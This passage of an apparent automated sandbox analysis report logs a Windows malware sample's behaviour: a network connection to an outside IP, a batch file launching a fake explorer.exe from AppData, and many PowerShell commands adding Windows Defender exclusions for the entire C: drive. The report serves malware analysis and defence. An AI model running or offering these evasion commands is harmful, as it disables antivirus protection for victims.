                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, Code function: 0_2_00007FFD343DEC5A GetSystemInfo,0_2_00007FFD343DEC5A
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591094
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590979
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590874
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590468
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590358
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590215
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590006
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589488
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589233
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589104
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588948
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588829
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588718
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588485
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588360
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588100
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587978
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587875
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587755
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587532
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587307
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586768
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586438
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586313
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Network Connect: 45.88.91.89 80
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Queries volume information: C:\Users\user\Desktop\CPNSQusnwC.exe VolumeInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
